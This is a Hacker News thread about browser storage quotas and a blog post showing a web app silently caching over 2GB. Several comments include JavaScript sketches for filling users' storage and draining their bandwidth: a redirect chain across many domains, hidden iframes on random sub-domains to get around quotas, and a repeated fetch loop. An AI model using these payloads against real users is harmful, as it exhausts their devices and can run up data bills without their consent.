Hacker News
How a web app can download and store over 2GB without you even knowing it (jclaes.blogspot.com)
112 points by Nemmie on March 25, 2012 | hide | past | favorite | 33 comments



The fact that there's a limit is not surprising. That the limit is 2GB is a little surprising, but this is across all sites, so ok. That there's no cache eviction when you reach the limit just seems like a bug. Why not use LRU?


I would not want one rogue site evicting the caches of all other sites.


It's just a cache. It can be repopulated. But I see your point, a lower per-domain quota would make more sense.


Isn't 2 GB the memory limit on V8 (http://code.google.com/p/v8/issues/detail?id=847)?


That's for the javascript engine, not necessarily for the caching.


The 2GB isn't just the local web-cache-size limit?


It would be fun to execute this against a mobile device, where storage is expensive. 2GB might be all that is required to choke the device. A neat client-side DDoS :)


Heh, you could easily DoS a Canadian home internet user (not mobile) by transferring a massive amount of data behind their back. So many people here are stuck with 25GB/mo limits.


That's absurd. I can't even imagine having to live with that kind of cap—I easily download 25GB in a day.


It's not uncommon to find ISPs with monthly quotas of a few GBs - aimed at light users.


I think Opera Mobile shouldn't have this cache problem either, similar to my comment about the desktop version. The default cache limit in Opera Mobile is ~2 MB.

I _believe_ that both quotas can be increased after confirmation from the user, but I haven't made any tests.


Or rack up an insane unexpected data bill.


iOS (and Android I think, but I primarily dev iOS so that's where my knowledge is) won't let a website exceed a 5MB local storage limit without explicit user consent...so I suppose still technically possible, but not without getting the user to agree to it first.


I wonder if you could still perform a DOS by doing the following:

  - register 1000 domains
  - when the browser navigates to the first domain, store 5 MB
  - once the store has finished, redirect to the next domain
  - repeat steps 2-3 ad infinitum
Anybody know if this would work?
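A rough sketch of that chain, assuming hypothetical domains evil0.example through evil999.example (every name here is made up; browser-only APIs are guarded so the sequencing logic runs anywhere):

```javascript
// Sketch of the cross-domain redirect chain described above.
// All domain names are hypothetical.

// Pure helper: the URL of the i-th hypothetical attack domain.
function nextDomain(i) {
  return "https://evil" + i + ".example/fill.html";
}

const TOTAL_DOMAINS = 1000;

// Each page at evil<i>.example would run something like this:
function fillAndRedirect(i) {
  if (typeof localStorage === "undefined") return; // not in a browser
  // Fill this origin's quota with ~5 million characters of junk
  // (actual byte accounting varies by engine).
  localStorage.setItem("filler", "x".repeat(5 * 1024 * 1024));
  // Hop to the next origin, repeating until every domain is filled.
  if (i + 1 < TOTAL_DOMAINS) location.href = nextDomain(i + 1);
}
```

Each hop stays under the per-origin prompt threshold, so the user never sees a dialog.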


That could probably work!

The documentation at http://dev.w3.org/html5/spec/offline.html#disk-space states that "care should be taken to ensure that the restrictions cannot be easily worked around using subdomains", so one would really have to use different domains as you write, which sounds a bit costly.


Sub-domains should work also then. Just make a page with a bunch of iframes, each on a different, random sub-domain.

Edit: Ooops; didn't see the comment above about sub-domains. Worth a try though!
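The iframe variant might look like this sketch, assuming a hypothetical attacker.example with wildcard DNS so every random sub-domain resolves:

```javascript
// Sketch of the subdomain-iframe variant: one page embeds many hidden
// iframes, each on a random sub-domain so each gets its own quota --
// exactly the loophole the spec text warns about.
// attacker.example and its wildcard DNS are hypothetical.

function randomSubdomainUrl() {
  const label = Math.random().toString(36).slice(2, 10);
  return "https://" + label + ".attacker.example/fill.html";
}

if (typeof document !== "undefined") { // browser only
  for (let i = 0; i < 100; i++) {
    const frame = document.createElement("iframe");
    frame.src = randomSubdomainUrl(); // each frame stores its own filler
    frame.style.display = "none";
    document.body.appendChild(frame);
  }
}
```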


A malicious actor might write a wordpress worm to assemble a domain botnet and cross-link them all to each other such that visiting one stores 5 megs of nonsense from every site on a visitor's client.


At least on Gingerbread, the browser has quite a low global limit -- I sometimes hit it just from using Twitter and Google Search.


I mean, theoretically. But would a user actually willingly wait out this process?


They would if you do it in an iframe while letting them play a flash game. They might even attribute slowdowns to the flash game.


It doesn't need to be downloaded. It can be populated with generated data using JavaScript.
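For instance, a sketch of purely client-side filler (the key name and size are arbitrary):

```javascript
// Filler data doesn't have to come over the network: it can be
// generated in JavaScript and written straight into storage.
// makeFiller is a plain helper; the setItem call is browser-only.

function makeFiller(chars) {
  // Build a string of the requested length. localStorage stores
  // UTF-16 strings, so the on-disk size depends on the engine.
  return "A".repeat(chars);
}

if (typeof localStorage !== "undefined") {
  localStorage.setItem("junk", makeFiller(5 * 1024 * 1024));
}
```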


You can store up to 50 MB in appcache (instead of localStorage) in mobile Safari. You can also store 50 MB in the Web SQL storage, but I don't know if that shares the appcache storage or is counted separately. The 5 MB limit for localStorage is because that's what the spec recommends.


localStorage and application cache are not the same thing.

localStorage is the one that prompts the user for more than 5MB, but the author was using application cache, which I've never seen prompt.


unless something's changed in the last couple months, localStorage prompts for any storage, and cuts you off completely at 5MB.


If you're talking bandwidth cap attacks, then you could just keep cleaning out local storage and downloading more from /dev/random perpetually.
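A sketch of that clear-and-refetch loop, assuming a hypothetical endpoint that serves random bytes:

```javascript
// Sketch of the bandwidth-burn attack: repeatedly download a large
// blob, discard it, clear local storage, and download again -- the
// cap is consumed even though nothing accumulates on disk.
// The URL is hypothetical.

async function burnBandwidth(url, rounds) {
  let total = 0;
  for (let i = 0; i < rounds; i++) {
    const res = await fetch(url);        // pull fresh data each round
    const buf = await res.arrayBuffer(); // force the full transfer
    total += buf.byteLength;
    if (typeof localStorage !== "undefined") localStorage.clear();
  }
  return total; // bytes transferred behind the user's back
}
```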


>As a user, I had no idea that the website I'm browsing is downloading a suspicious amount of data in the background.

not when you're browsing localhost, because it's implicitly trusted. chrome doesn't prompt you to allow access to the location services API when you're local either, but it does prompt for permission on the web. does the browser still not warn you if you try this same test using a remote server?


Hmm, that would be odd. Geolocation asks for permission even if it's localhost. Also when I download Angry Birds, no permission is asked.


This is not an issue in either Opera or Firefox. The title should probably reflect that it's limited to Chrome (and possibly other Webkit browsers + IE?).


Why is it not an issue in Opera and Firefox? Do they have smaller maximum caches? Or do they notify you of the background transfers?


I don't think either notifies you about the background transfers, but e.g. Opera's default cache limit for Application Cache is ~50 MB according to http://www.opera.com/support/usingopera/operaini/.


the default local storage limit for Firefox is 5 megs per domain.


Sorry for nitpicking, but I think local storage is a part of Web Storage (http://dev.w3.org/html5/webstorage/), and not Application Cache (http://www.whatwg.org/specs/web-apps/current-work/multipage/... or http://dev.w3.org/html5/spec/offline.html).

I think that the Application Cache quota is not strictly connected to the local storage and session storage limits.


That's correct. Chromium has talked about unifying all these kinds of storage under one quota system, but it's not done yet.




